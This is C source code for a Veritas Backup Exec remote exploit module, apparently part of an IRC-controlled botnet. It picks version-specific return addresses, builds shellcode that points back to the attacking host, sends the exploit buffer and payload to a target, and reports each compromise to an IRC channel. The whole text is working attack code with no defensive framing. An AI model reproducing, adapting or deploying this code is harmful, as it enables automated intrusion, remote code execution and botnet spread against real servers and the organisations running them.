BOOL VertiasBackupExec( EXINFO exinfo, VertiasBackupExec_Version eVersion ) { char *pszVerString; // --- int nShellSize; char szShellBuf[ 512 ]; // --- SOCKET nFDSocket; sockaddr_in ServerAddr; // --- int nCounter; // prepare version depending data if( eVersion == Backup_Exec_v9_1_4691_SP1_SP0 ) { memcpy( &talk[ 37 ], &v91sp0sp1, 4 ); memcpy( &talk[ 72 ], &esisp0sp1, 4 ); pszVerString = "v9.1.4691.0+1"; } else if( eVersion == Backup_Exec_v8_5_3572 ) { memcpy( &talk[ 37 ], &v85, 4 ); memcpy( &talk[ 72 ], &esiold, 4 ); pszVerString = "v8.5.3572"; } else return FALSE; // get shellcode nShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); if( !nShellSize ) return FALSE; // create socket nFDSocket = fsocket( AF_INET, SOCK_STREAM, IPPROTO_IP ); if( nFDSocket == INVALID_SOCKET ) return FALSE; // connect to it memset( &ServerAddr, 0, sizeof( ServerAddr ) ); ServerAddr.sin_family = AF_INET; ServerAddr.sin_port = fhtons( exinfo.port ); ServerAddr.sin_addr.s_addr = finet_addr( exinfo.ip ); if( fconnect( nFDSocket, (sockaddr*)&ServerAddr, sizeof( ServerAddr ) ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } // send talk if( fsend( nFDSocket, talk, sizeof( talk ) - 1, 0 ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } Sleep( 10 ); // send payload(s) for( nCounter = 0; nCounter < 7; nCounter++ ) { if( fsend( nFDSocket, szShellBuf, strlen( szShellBuf ), 0 ) == SOCKET_ERROR ) { fclosesocket( nFDSocket ); return FALSE; } Sleep( 10 ); } Sleep( 1000 ); fclosesocket( nFDSocket ); // MESSAGE(S) char buffer[ IRCLINE ]; _snprintf(buffer, sizeof(buffer), "[%s (%s)]: Exploiting IP: %s.", exploit[exinfo.exploit].name, pszVerString, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; }